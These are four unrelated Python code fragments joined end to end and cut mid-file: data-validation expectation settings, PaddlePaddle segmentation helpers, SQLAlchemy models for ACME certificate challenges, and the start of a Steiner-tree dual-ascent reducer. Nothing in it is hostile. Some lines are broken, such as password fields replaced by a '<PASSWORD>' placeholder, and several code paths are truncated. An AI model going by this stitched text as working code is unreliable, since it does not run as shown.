"success_kwargs": ["min_value", "max_value", "strict_min", "strict_max"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"min_value": None,
"max_value": None,
"strict_min": False,
"strict_max": False,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_most_common_value_to_be_in_set": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["value_set", "ties_okay"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"ties_okay": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_sum_to_be_between": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["min_value", "max_value", "strict_min", "strict_max"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"min_value": None,
"max_value": None,
"strict_min": False,
"strict_max": False,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_min_to_be_between": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": [
"min_value",
"max_value",
"strict_min",
"strict_max",
"parse_strings_as_datetimes",
"output_strftime_format",
],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"min_value": None,
"max_value": None,
"strict_min": False,
"strict_max": False,
"parse_strings_as_datetimes": None,
"output_strftime_format": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_max_to_be_between": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": [
"min_value",
"max_value",
"strict_min",
"strict_max",
"parse_strings_as_datetimes",
"output_strftime_format",
],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"min_value": None,
"max_value": None,
"strict_min": False,
"strict_max": False,
"parse_strings_as_datetimes": None,
"output_strftime_format": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_chisquare_test_p_value_to_be_greater_than": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": ["partition_object", "p", "tail_weight_holdout"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"partition_object": None,
"p": 0.05,
"tail_weight_holdout": 0,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_bootstrapped_ks_test_p_value_to_be_greater_than": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": [
"partition_object",
"p",
"bootstrap_samples",
"bootstrap_sample_size",
],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"partition_object": None,
"p": 0.05,
"bootstrap_samples": None,
"bootstrap_sample_size": None,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_kl_divergence_to_be_less_than": {
"domain_kwargs": ["column", "row_condition", "condition_parser"],
"success_kwargs": [
"partition_object",
"threshold",
"tail_weight_holdout",
"internal_weight_holdout",
"bucketize_data",
],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"partition_object": None,
"threshold": None,
"tail_weight_holdout": 0,
"internal_weight_holdout": 0,
"bucketize_data": True,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_pair_values_to_be_equal": {
"domain_kwargs": [
"column_A",
"column_B",
"row_condition",
"condition_parser",
],
"success_kwargs": ["ignore_row_if"],
"default_kwarg_values": {
"row_condition": None,
"condition_parser": "pandas",
"ignore_row_if": "both_values_are_missing",
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_pair_values_A_to_be_greater_than_B": {
"domain_kwargs": [
"column_A",
"column_B",
"row_condition",
"condition_parser",
],
"success_kwargs": [
"or_equal",
"parse_strings_as_datetimes",
"allow_cross_type_comparisons",
"ignore_row_if",
],
| |
np.random.permutation(np.shape(x)[0])
return perm
def iszero(x):
x = np.array(x)
return True if np.shape(x)[0] == 0 else False
def get_cur_pos(cur_pos):
cur_pos = np.array(cur_pos)
return np.reshape(cur_pos, (-1,1))
def center_size(boxes):
""" Convert prior_boxes to (cx, cy, w, h)
representation for comparison to center-size form ground truth data.
Args:
boxes: (tensor) point_form boxes
Return:
boxes: (tensor) Converted xmin, ymin, xmax, ymax form of boxes.
"""
return np.concatenate(( (boxes[:, 2:] + boxes[:, :2])/2, # cx, cy
boxes[:, 2:] - boxes[:, :2] ), 1) # w, h
def assign_segment(segment_t, cur_class_t, cur_num, downsampled_masks):
segment_t = np.array(segment_t)
cur_class_t = np.array(cur_class_t)
cur_num = np.array(cur_num)[0]
downsampled_masks = np.array(downsampled_masks)
for obj_idx in range(cur_num):
segment_t[cur_class_t[obj_idx]-1] = np.maximum(segment_t[cur_class_t[obj_idx]-1], downsampled_masks[obj_idx])
return segment_t
def get_segment_t_tensor(mask_t, cur_class_t, cur_num, mask_w, mask_h):
downsampled_masks = fluid.layers.squeeze(
fluid.layers.resize_bilinear(
fluid.layers.unsqueeze(input=mask_t, axes=[0]),
out_shape=[mask_w, mask_h],
align_corners=False),
axes=[0])
downsampled_masks = fluid.layers.cast(downsampled_masks > 0.5, 'float32')
segment_t = fluid.layers.zeros(shape=[80, mask_w, mask_h], dtype='float32')
fluid.layers.py_func(func=assign_segment, x=[segment_t, cur_class_t, cur_num, downsampled_masks] ,out=segment_t)
return segment_t
def get_segment_t(mask_t, cur_class_t, cur_num):
mask_t = np.array(mask_t)
cur_class_t = np.array(cur_class_t)
cur_num = np.array(cur_num)[0]
downsampled_masks = np.zeros((cur_num, 72, 72))
for idx in range(cur_num):
temp = mask_t[idx]
downsampled_masks[idx] = cv2.resize(temp, (72, 72))
downsampled_masks = (downsampled_masks > 0.5).astype('float32')
segment_t = np.zeros((80, 72, 72),dtype='float32')
for obj_idx in range(cur_num):
segment_t[cur_class_t[obj_idx]-1] = numpyminmax(segment_t[cur_class_t[obj_idx]-1], downsampled_masks[obj_idx])
return segment_t
def get_posneg(conf_data, conf_t, pos):
conf_data = np.array(conf_data)
batch_size = np.shape(conf_data)[0]
conf_t = np.array(conf_t)
pos = np.array(pos)
batch_conf = np.reshape(conf_data, (-1, 81))
loss_c = log_sum_exp(batch_conf) - np.reshape(batch_conf[:, 0],(-1,1))
loss_c = np.reshape(loss_c, (batch_size, -1))
loss_c[pos] = 0
loss_c[conf_t < 0] = 0
loss_idx = np.argsort(-loss_c, 1)
idx_rank = np.argsort(loss_idx, 1)
num_pos = np.sum(pos, 1, keepdims=True)
negpos_ratio = 3
num_neg = np.clip(negpos_ratio * num_pos, a_min=0, a_max=np.shape(pos)[1]-1)
neg = idx_rank < np.broadcast_to(num_neg,np.shape(idx_rank))
neg[pos] = 0
neg[conf_t < 0] = 0
pos_idx = np.broadcast_to(np.expand_dims(pos, 2),np.shape(conf_data))
neg_idx = np.broadcast_to(np.expand_dims(neg, 2),np.shape(conf_data))
posneg_idx = np.add(pos_idx, neg_idx)
posneg = np.add(pos, neg)
posneg_idx = np.reshape(posneg_idx,(-1,1))
return posneg, np.reshape(posneg,(-1,1)), posneg_idx
def log_sum_exp(x):
x_max = x.max()
return np.log(np.exp(x-x_max).sum(1,keepdims=True)) + x_max
start_t = 0
def start_time():
global start_t
start_t = time.clock()
def end_time():
global start_t
print('time2',time.clock() - start_t)
def crop_tensor(masks, boxes):
padding = 1
s = fluid.layers.shape(masks)
h = fluid.layers.cast(s[0], 'float32')
w = fluid.layers.cast(s[1], 'float32')
n = fluid.layers.cast(s[2], 'float32')
x1, x2 = sanitize_coordinates_tensor(boxes[:, 0], boxes[:, 2], w, padding, cast=False)
y1, y2 = sanitize_coordinates_tensor(boxes[:, 1], boxes[:, 3], h, padding, cast=False)
rows = fluid.layers.expand_as(fluid.layers.reshape(fluid.layers.range(0, w, 1, 'float32'), shape=(1, -1, 1)), target_tensor=masks)
cols = fluid.layers.expand_as(fluid.layers.reshape(fluid.layers.range(0, h, 1, 'float32'), shape=(-1, 1, 1)), target_tensor=masks)
masks_left = rows >= fluid.layers.reshape(x1, shape=(1,1,-1))
masks_right = rows < fluid.layers.reshape(x2, shape=(1,1,-1))
masks_up = cols >= fluid.layers.reshape(y1, shape=(1,1,-1))
masks_down = cols < fluid.layers.reshape(y2, shape=(1,1,-1))
masks_left = fluid.layers.cast(masks_left, 'float32')
masks_right = fluid.layers.cast(masks_right, 'float32')
masks_up = fluid.layers.cast(masks_up, 'float32')
masks_down = fluid.layers.cast(masks_down, 'float32')
crop_mask = masks_left * masks_right * masks_up * masks_down
crop_mask.stop_gradient = True
return masks * crop_mask
def sanitize_coordinates_tensor(_x1, _x2, img_size, padding:int=0, cast:bool=True, is_mask=True):
_x1 = fluid.layers.elementwise_mul(fluid.layers.cast(_x1, 'float32'), img_size)
_x2 = fluid.layers.elementwise_mul(fluid.layers.cast(_x2, 'float32'), img_size)
if cast:
_x1 = fluid.layers.cast(_x1, 'int32')
_x2 = fluid.layers.cast(_x2, 'int32')
x1 = fluid.layers.elementwise_min(_x1, _x2)
x2 = fluid.layers.elementwise_max(_x1, _x2)
x1 = fluid.layers.clip(x=x1-padding, min=0, max=10000)
if is_mask:
x2 = fluid.layers.clip(x=x2+padding, min=-10000, max=138)
else:
x2 = fluid.layers.clip(x=x2+padding, min=-10000, max=550)
return x1, x2
def crop(masks, boxes):
"""
"Crop" predicted masks by zeroing out everything not in the predicted bbox.
Vectorized by Chong (thanks Chong).
Args:
- masks should be a size [h, w, n] tensor of masks
- boxes should be a size [n, 4] tensor of bbox coords in relative point form
"""
start_time = time.time()
padding = 1
masks = np.array(masks)
boxes = np.array(boxes)
h, w, n = np.shape(masks)
x1, x2 = sanitize_coordinates(boxes[:, 0], boxes[:, 2], w, padding, cast=False)
y1, y2 = sanitize_coordinates(boxes[:, 1], boxes[:, 3], h, padding, cast=False)
rows = np.broadcast_to(np.reshape(np.arange(w, dtype=x1.dtype),(1, -1, 1)),(h, w, n))
cols = np.broadcast_to(np.reshape(np.arange(h, dtype=x1.dtype),(-1, 1, 1)),(h, w, n))
masks_left = rows >= np.reshape(x1, (1, 1, -1))
masks_right = rows < np.reshape(x2, (1, 1, -1))
masks_up = cols >= np.reshape(y1, (1, 1, -1))
masks_down = cols < np.reshape(y2, (1, 1, -1))
crop_mask = masks_left * masks_right * masks_up * masks_down
end_time = time.time()
return crop_mask.astype('float32')
def sanitize_coordinates(_x1, _x2, img_size:int, padding:int=0, cast:bool=True):
"""
Sanitizes the input coordinates so that x1 < x2, x1 != x2, x1 >= 0, and x2 <= image_size.
Also converts from relative to absolute coordinates and casts the results to long tensors.
If cast is false, the result won't be cast to longs.
Warning: this does things in-place behind the scenes so copy if necessary.
"""
_x1 = _x1 * img_size
_x2 = _x2 * img_size
if cast:
_x1 = _x1.astype('int32')
_x2 = _x2.astype('int32')
x1 = numpyminmax(_x1, _x2, False)
x2 = numpyminmax(_x1, _x2)
x1 = np.clip(x1-padding, a_min=0, a_max=1000000)
x2 = np.clip(x2+padding, a_min=-1000000, a_max=img_size)
return x1, x2
def numpyminmax(x,y,Max=True):
if Max:
return x*(x>y)+y*(x<y)
else:
return x*(y>x)+y*(y<x)
def get_target_tensor(gt_box, priors, gt_class, is_crowd, gt_num, loc_data, batch_size, num_priors):
loc_t = []
gt_box_t = []
conf_t = []
idx_t = []
labels = []
for idx in range(batch_size):
num = gt_num[idx]
truths = gt_box[idx, 0:num]
labels.append(gt_class[idx, 0:num])
crowd_boxes = None
pos_threshold = 0.5
neg_threshold = 0.4
loc, conf, best_truth_idx = match_tensor(pos_threshold, neg_threshold,
truths, priors, labels[idx], crowd_boxes,
loc_t, conf_t, idx_t, idx)
loc_t.append(loc)
conf_t.append(conf)
idx_t.append(best_truth_idx)
gt_box_t.append(fluid.layers.gather(truths, idx_t[idx]))
loc_t = fluid.layers.stack(loc_t, 0)
gt_box_t = fluid.layers.stack(gt_box_t, 0)
conf_t = fluid.layers.stack(conf_t, 0)
idx_t = fluid.layers.stack(idx_t, 0)
pos = conf_t > 0
return loc_t, gt_box_t, conf_t, idx_t, pos
def transform_conf(conf, best_truth_overlap):
conf = np.array(conf)
best_truth_overlap = np.array(best_truth_overlap)
pos_thresh = 0.5
neg_thresh = 0.4
conf[best_truth_overlap < pos_thresh] = -1
conf[best_truth_overlap < neg_thresh] = 0
return conf.astype('int32')
def assign_labels(overlaps, best_truth_overlap, best_truth_idx):
overlaps = np.array(overlaps)
best_truth_overlap = np.array(best_truth_overlap)
best_truth_idx = np.array(best_truth_idx)
for _ in range(np.shape(overlaps)[0]):
best_prior_overlap = overlaps.max(1)
best_prior_idx = overlaps.argmax(1)
j = best_prior_overlap.argmax(0)
i = best_prior_idx[j]
overlaps[:, i] = -1
overlaps[j, :] = -1
best_truth_overlap[i] = 2
best_truth_idx[i] = j
return best_truth_overlap, best_truth_idx
def match_tensor(pos_thresh, neg_thresh, truths, priors, labels, crowd_boxes, loc_t, conf_t, idx_t, idx):
use_yolo_regressors = False
decoded_priors = point_form_tensor(priors)
#shape:[gt_num, num_priors]
overlaps = jaccard_tensor(truths, decoded_priors)
best_truth_overlap, best_truth_idx = fluid.layers.argsort(overlaps, 0, descending=True)
best_truth_overlap = best_truth_overlap[0]
best_truth_idx = best_truth_idx[0]
fluid.layers.py_func(func=assign_labels, x=[overlaps, best_truth_overlap, best_truth_idx] ,out=[best_truth_overlap, best_truth_idx])
matches = fluid.layers.gather(truths, best_truth_idx)
conf = fluid.layers.gather(labels, best_truth_idx)
fluid.layers.py_func(func=transform_conf, x=[conf, best_truth_overlap] ,out=conf)
loc = encode_tensor(matches, priors, use_yolo_regressors)
return loc, conf, best_truth_idx
def decode(loc, priors):
variances = [0.1, 0.2]
boxes = np.concatenate([
priors[:, :2] + loc[:, :2] * variances[0] * priors[:, 2:],
priors[:, 2:] * np.exp(loc[:, 2:] * variances[1])], 1)
boxes[:, :2] -= boxes[:, 2:] / 2
boxes[:, 2:] += boxes[:, :2]
return boxes
def encode_tensor(matched, priors, use_yolo_regressors:bool=False):
variances = [0.1, 0.2]
# dist b/t match center and prior's center
g_cxcy = (matched[:, :2] + matched[:, 2:])/2.0 - priors[:, :2]
# encode variance
g_cxcy /= (variances[0] * priors[:, 2:])
# match wh / prior wh
g_wh = (matched[:, 2:] - matched[:, :2]) / priors[:, 2:]
g_wh = fluid.layers.log(g_wh) / variances[1]
# return target for smooth_l1_loss
loc = fluid.layers.concat([g_cxcy, g_wh], 1) # [num_priors,4]
return loc
def jaccard_tensor_3D(box_a, box_b, iscrowd:bool=False):
use_batch = True
A = fluid.layers.shape(box_a)[1]
B = fluid.layers.shape(box_b)[1]
inter = intersect_tensor(box_a, box_b)
area_a = fluid.layers.expand(fluid.layers.unsqueeze(((box_a[:, :, 2]-box_a[:, :, 0]) *
(box_a[:, :, 3]-box_a[:, :, 1])),2), [1, 1, B])
area_b = fluid.layers.expand(fluid.layers.unsqueeze(((box_b[:, :, 2]-box_b[:, :, 0]) *
(box_b[:, :, 3]-box_b[:, :, 1])),1), [1, A, 1])
union = area_a + area_b - inter
out = inter / (area_a) if iscrowd else inter / (union)
return out if use_batch else fluid.layers.squeeze(out, [0])
def jaccard_tensor(box_a, box_b, iscrowd:bool=False):
use_batch = False
box_a = fluid.layers.unsqueeze(box_a, [0])
box_b = fluid.layers.unsqueeze(box_b, [0])
A = fluid.layers.shape(box_a)[1]
B = fluid.layers.shape(box_b)[1]
inter = intersect_tensor(box_a, box_b)
area_a = fluid.layers.expand(fluid.layers.unsqueeze(((box_a[:, :, 2]-box_a[:, :, 0]) *
(box_a[:, :, 3]-box_a[:, :, 1])),2), [1, 1, B])
area_b = fluid.layers.expand(fluid.layers.unsqueeze(((box_b[:, :, 2]-box_b[:, :, 0]) *
(box_b[:, :, 3]-box_b[:, :, 1])),1), [1, A, 1])
union = area_a + area_b - inter
out | |
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# acme_event_log = sa_orm_relationship(
# "AcmeEventLog",
# primaryjoin="AcmeChallenge.acme_event_log_id==AcmeEventLog.id",
# uselist=False,
# back_populates="acme_challenges",
# )
acme_challenge_polls = sa_orm_relationship(
"AcmeChallengePoll",
primaryjoin="AcmeChallenge.id==AcmeChallengePoll.acme_challenge_id",
uselist=True,
back_populates="acme_challenge",
)
acme_authorization = sa_orm_relationship(
"AcmeAuthorization",
primaryjoin="AcmeChallenge.acme_authorization_id==AcmeAuthorization.id",
uselist=False,
back_populates="acme_challenges",
overlaps="acme_challenge_dns_01,acme_challenge_http_01,acme_challenge_tls_alpn_01",
)
acme_orderless = sa_orm_relationship(
"AcmeOrderless",
primaryjoin="AcmeChallenge.acme_orderless_id==AcmeOrderless.id",
uselist=False,
back_populates="acme_challenges",
)
domain = sa_orm_relationship(
"Domain",
primaryjoin="AcmeChallenge.domain_id==Domain.id",
uselist=False,
back_populates="acme_challenges",
)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
@property
def acme_challenge_type(self):
if self.acme_challenge_type_id:
return model_utils.AcmeChallengeType.as_string(self.acme_challenge_type_id)
return None
@property
def acme_status_challenge(self):
return model_utils.Acme_Status_Challenge.as_string(
self.acme_status_challenge_id
)
@property
def domain_name(self):
return self.domain.domain_name
@property
def challenge_instructions_short(self):
if self.acme_challenge_type == "http-01":
return "PeterSSLers is configured to answer this challenge."
elif self.acme_challenge_type == "dns-01":
return "This challenge may require DNS configuration."
return "PeterSSLers can not answer this challenge."
@property
def is_can_acme_server_sync(self):
if not self.challenge_url:
return False
if not self.acme_authorization_id:
# auth's order_id needed for the AcmeAccount
return False
return True
@property
def is_can_acme_server_trigger(self):
if not self.challenge_url:
return False
if not self.acme_authorization_id:
# auth's order_id needed for the AcmeAccount
return False
if (
self.acme_status_challenge
not in model_utils.Acme_Status_Challenge.OPTIONS_TRIGGER
):
return False
return True
@property
def is_configured_to_answer(self):
if not self.is_can_acme_server_trigger:
return False
if self.acme_challenge_type == "http-01":
return True
elif self.acme_challenge_type == "dns-01":
if self.domain.acme_dns_server_account__active:
return True
return False
@property
def as_json(self):
dbSession = sa_Session.object_session(self)
request = dbSession.info["request"]
admin_url = request.admin_url if request else ""
return {
"id": self.id,
"acme_challenge_type": self.acme_challenge_type,
"acme_status_challenge": self.acme_status_challenge,
"domain": {
"id": self.domain_id,
"domain_name": self.domain.domain_name,
},
"keyauthorization": self.keyauthorization,
"timestamp_created": self.timestamp_created_isoformat,
"timestamp_updated": self.timestamp_updated_isoformat,
"token": self.token,
"url_acme_server_sync": "%s/acme-challenge/%s/acme-server/sync.json"
% (admin_url, self.id)
if self.is_can_acme_server_sync
else None,
"url_acme_server_trigger": "%s/acme-challenge/%s/acme-server/trigger.json"
% (admin_url, self.id)
if self.is_can_acme_server_trigger
else None,
# "acme_event_log_id": self.acme_event_log_id,
}
# ==============================================================================
class AcmeChallengeCompeting(Base, _Mixin_Timestamps_Pretty):
# This is for tracking an EdgeCase
__tablename__ = "acme_challenge_competing"
id = sa.Column(sa.Integer, primary_key=True)
timestamp_created = sa.Column(sa.DateTime, nullable=False)
domain_id = sa.Column(sa.Integer, sa.ForeignKey("domain.id"), nullable=True)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
domain = sa_orm_relationship(
"Domain",
primaryjoin="AcmeChallengeCompeting.domain_id==Domain.id",
uselist=False,
)
acme_challenge_competing_2_acme_challenge = sa_orm_relationship(
"AcmeChallengeCompeting2AcmeChallenge",
primaryjoin=(
"AcmeChallengeCompeting.id==AcmeChallengeCompeting2AcmeChallenge.acme_challenge_competing_id"
),
uselist=True,
back_populates="acme_challenge_competing",
)
class AcmeChallengeCompeting2AcmeChallenge(Base, _Mixin_Timestamps_Pretty):
__tablename__ = "acme_challenge_competing_2_acme_challenge"
acme_challenge_competing_id = sa.Column(
sa.Integer, sa.ForeignKey("acme_challenge_competing.id"), primary_key=True
)
acme_challenge_id = sa.Column(
sa.Integer, sa.ForeignKey("acme_challenge.id"), primary_key=True
)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
acme_challenge_competing = sa_orm_relationship(
"AcmeChallengeCompeting",
primaryjoin=(
"AcmeChallengeCompeting2AcmeChallenge.acme_challenge_competing_id==AcmeChallengeCompeting.id"
),
uselist=False,
back_populates="acme_challenge_competing_2_acme_challenge",
)
acme_challenge = sa_orm_relationship(
"AcmeChallenge",
primaryjoin=(
"AcmeChallengeCompeting2AcmeChallenge.acme_challenge_id==AcmeChallenge.id"
),
uselist=False,
)
# ==============================================================================
class AcmeChallengePoll(Base, _Mixin_Timestamps_Pretty):
"""
log ACME Challenge polls
"""
__tablename__ = "acme_challenge_poll"
id = sa.Column(sa.Integer, primary_key=True)
acme_challenge_id = sa.Column(
sa.Integer, sa.ForeignKey("acme_challenge.id"), nullable=False
)
timestamp_polled = sa.Column(sa.DateTime, nullable=False)
remote_ip_address_id = sa.Column(
sa.Integer, sa.ForeignKey("remote_ip_address.id"), nullable=False
)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
acme_challenge = sa_orm_relationship(
"AcmeChallenge",
primaryjoin="AcmeChallengePoll.acme_challenge_id==AcmeChallenge.id",
uselist=False,
back_populates="acme_challenge_polls",
)
remote_ip_address = sa_orm_relationship(
"RemoteIpAddress",
primaryjoin="AcmeChallengePoll.remote_ip_address_id==RemoteIpAddress.id",
uselist=False,
back_populates="acme_challenge_polls",
)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
@property
def as_json(self):
return {
"id": self.id,
"AcmeChallenge": self.acme_challenge.as_json,
"timestamp_polled": self.timestamp_polled_isoformat,
"remote_ip_address": {
"id": self.remote_ip_address_id,
"ip_address": self.remote_ip_address.remote_ip_address,
},
}
# ==============================================================================
class AcmeChallengeUnknownPoll(Base, _Mixin_Timestamps_Pretty):
"""
log polls of non-existant ace challenges
"""
__tablename__ = "acme_challenge_unknown_poll"
id = sa.Column(sa.Integer, primary_key=True)
domain = sa.Column(sa.Unicode(255), nullable=False)
challenge = sa.Column(sa.Unicode(255), nullable=False)
timestamp_polled = sa.Column(sa.DateTime, nullable=False)
remote_ip_address_id = sa.Column(
sa.Integer, sa.ForeignKey("remote_ip_address.id"), nullable=False
)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
remote_ip_address = sa_orm_relationship(
"RemoteIpAddress",
primaryjoin="AcmeChallengeUnknownPoll.remote_ip_address_id==RemoteIpAddress.id",
uselist=False,
back_populates="acme_challenge_unknown_polls",
)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
@property
def as_json(self):
return {
"id": self.id,
"domain": self.domain,
"challenge": self.challenge,
"timestamp_polled": self.timestamp_polled_isoformat,
"remote_ip_address": {
"id": self.remote_ip_address_id,
"ip_address": self.remote_ip_address.remote_ip_address,
},
}
# ==============================================================================
class AcmeDnsServer(Base, _Mixin_Timestamps_Pretty):
__tablename__ = "acme_dns_server"
id = sa.Column(sa.Integer, primary_key=True)
timestamp_created = sa.Column(sa.DateTime, nullable=False)
is_active = sa.Column(sa.Boolean, nullable=False, default=True)
is_global_default = sa.Column(sa.Boolean, nullable=True, default=None)
root_url = sa.Column(sa.Unicode(255), nullable=False)
operations_event_id__created = sa.Column(
sa.Integer, sa.ForeignKey("operations_event.id"), nullable=False
)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
acme_dns_server_accounts = sa_orm_relationship(
"AcmeDnsServerAccount",
primaryjoin="AcmeDnsServer.id==AcmeDnsServerAccount.acme_dns_server_id",
uselist=True,
back_populates="acme_dns_server",
)
operations_event__created = sa_orm_relationship(
"OperationsEvent",
primaryjoin="AcmeDnsServer.operations_event_id__created==OperationsEvent.id",
uselist=False,
)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
@property
def as_json(self):
return {
"id": self.id,
"root_url": self.root_url,
"timestamp_created": self.timestamp_created_isoformat,
"is_active": True if self.is_active else False,
"is_global_default": True if self.is_global_default else False,
}
# ==============================================================================
class AcmeDnsServerAccount(Base, _Mixin_Timestamps_Pretty):
__table_args__ = (
sa.UniqueConstraint(
"acme_dns_server_id",
"domain_id",
"is_active",
name="domain_active_account",
),
)
__tablename__ = "acme_dns_server_account"
id = sa.Column(sa.Integer, primary_key=True)
timestamp_created = sa.Column(sa.DateTime, nullable=False)
acme_dns_server_id = sa.Column(
sa.Integer, sa.ForeignKey("acme_dns_server.id"), nullable=False
)
domain_id = sa.Column(sa.Integer, sa.ForeignKey("domain.id"), nullable=False)
is_active = sa.Column(
sa.Boolean, nullable=True, default=True
) # allow NULL for constraint to work
username = sa.Column(sa.Unicode(255), nullable=False)
password = sa.Column(sa.Unicode(255), nullable=False)
fulldomain = sa.Column(sa.Unicode(255), nullable=False)
subdomain = sa.Column(sa.Unicode(255), nullable=False)
allowfrom = sa.Column(sa.Unicode(255), nullable=True)
operations_event_id__created = sa.Column(
sa.Integer, sa.ForeignKey("operations_event.id"), nullable=False
)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
acme_dns_server = sa_orm_relationship(
"AcmeDnsServer",
primaryjoin="AcmeDnsServerAccount.acme_dns_server_id==AcmeDnsServer.id",
uselist=False,
back_populates="acme_dns_server_accounts",
)
domain = sa_orm_relationship(
"Domain",
primaryjoin="AcmeDnsServerAccount.domain_id==Domain.id",
uselist=False,
back_populates="acme_dns_server_accounts",
)
operations_event__created = sa_orm_relationship(
"OperationsEvent",
primaryjoin="AcmeDnsServerAccount.operations_event_id__created==OperationsEvent.id",
uselist=False,
)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
@property
def password_sample(self):
return "%s...%s" % (self.password[:5], self.password[-5:])
@property
def as_json(self):
return {
"AcmeDnsServer": self.acme_dns_server.as_json,
"Domain": self.domain.as_json,
"id": self.id,
"timestamp_created": self.timestamp_created_isoformat,
"username": self.username,
"password": <PASSWORD>,
"fulldomain": self.fulldomain,
"subdomain": self.subdomain,
"allowfrom": json.loads(self.allowfrom),
}
@property
def pyacmedns_dict(self):
"""
:returns: a dict of items required for a pyacmedns client
"""
return {
"username": self.username,
"password": <PASSWORD>,
"fulldomain": self.fulldomain,
"subdomain": self.subdomain,
"allowfrom": json.loads(self.allowfrom) if self.allowfrom else [],
}
# ==============================================================================
class AcmeEventLog(Base, _Mixin_Timestamps_Pretty):
"""
log acme requests
"""
__tablename__ = "acme_event_log"
id = sa.Column(sa.Integer, primary_key=True)
timestamp_event = sa.Column(sa.DateTime, nullable=False)
acme_event_id = sa.Column(sa.Integer, nullable=False) # AcmeEvent
acme_account_id = sa.Column(
sa.Integer, sa.ForeignKey("acme_account.id", use_alter=True), nullable=True
)
acme_authorization_id = sa.Column(
sa.Integer,
sa.ForeignKey("acme_authorization.id", use_alter=True),
nullable=True,
)
acme_challenge_id = sa.Column(
sa.Integer, sa.ForeignKey("acme_challenge.id", use_alter=True), nullable=True
)
acme_order_id = sa.Column(
sa.Integer, sa.ForeignKey("acme_order.id", use_alter=True), nullable=True
)
certificate_request_id = sa.Column(
sa.Integer,
sa.ForeignKey("certificate_request.id", use_alter=True),
nullable=True,
)
certificate_signed_id = sa.Column(
sa.Integer,
sa.ForeignKey("certificate_signed.id", use_alter=True),
nullable=True,
)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# acme_challenges = sa_orm_relationship(
# "AcmeChallenge",
# primaryjoin="AcmeEventLog.id==AcmeChallenge.acme_event_log_id",
# order_by="AcmeChallenge.id.asc()",
# back_populates="acme_event_log",
# )
# - - - - - - - | |
from sys import maxint
from heapq import heappop, heappush, heapify
from networkx import single_source_dijkstra_path_length, single_source_dijkstra_path, is_connected
from structures import steiner_graph as sg
import steiner_approximation as sa
from reduction import degree, long_edges, ntdk, sdc
from preselection import short_links, nearest_vertex
from reducer import Reducer
from collections import deque, defaultdict
import solver.heuristics.da_graph as dag
class DualAscent:
"""A reduction a that uses dual ascent on the LP relaxation to estimate a lower bound"""
good_roots = deque(maxlen=10)
def __init__(self, threshold=0.01, active_treshold=0.025, run_last=True):
self.runs = 0
self._done = False
self.enabled = True
self._run_last = run_last
self._threshold = threshold
self._last_run = -1
self.active_threshold = active_treshold
def reduce(self, steiner, prev_cnt, curr_cnt):
# This invalidates the approximation. This is important in case the DA doesnt go through in the last run
# so the solver has a valid approximation
steiner.invalidate_approx(-2)
goal = len(steiner.graph.edges) * self._threshold
if len(steiner.terminals) < 4:
return 0
# Let the others do their thing first
if (len(steiner.graph.edges) > 2000 and curr_cnt > len(steiner.graph.edges) * self.active_threshold) \
or not self.enabled:
return 0
self.runs += 1
# parameters, adapt to instance
solution_limit = solution_rec_limit = prune_limit = prune_rec_limit = 0
if len(steiner.graph.nodes) < 250 and len(steiner.graph.edges) / len(steiner.graph.nodes) < 5:
solution_limit = 30
solution_rec_limit = 10
prune_limit = 10
prune_rec_limit = 5
# Small graph
elif len(steiner.graph.nodes) < 500 and len(steiner.graph.edges) / len(steiner.graph.nodes) < 3:
solution_limit = 15
solution_rec_limit = 5
prune_limit = 5
prune_rec_limit = 3
# Medium
elif len(steiner.graph.nodes) < 3000 and len(steiner.graph.edges) / len(steiner.graph.nodes) < 3:
solution_limit = 10
solution_rec_limit = 5
prune_limit = 3
prune_rec_limit = 3
# Dense graph
elif len(steiner.graph.edges) / len(steiner.graph.nodes) > 3 or len(steiner.terminals) > 1000:
solution_limit = 2
solution_rec_limit = 1
prune_limit = 1
prune_rec_limit = 0
# Large, not dense graphs
elif len(steiner.graph.nodes) < 10000:
solution_limit = 10
solution_rec_limit = 0
prune_limit = 1
prune_rec_limit = 0
else:
solution_limit = 5
solution_rec_limit = 0
prune_limit = 1
prune_rec_limit = 0
# Init
ts = list(steiner.terminals)
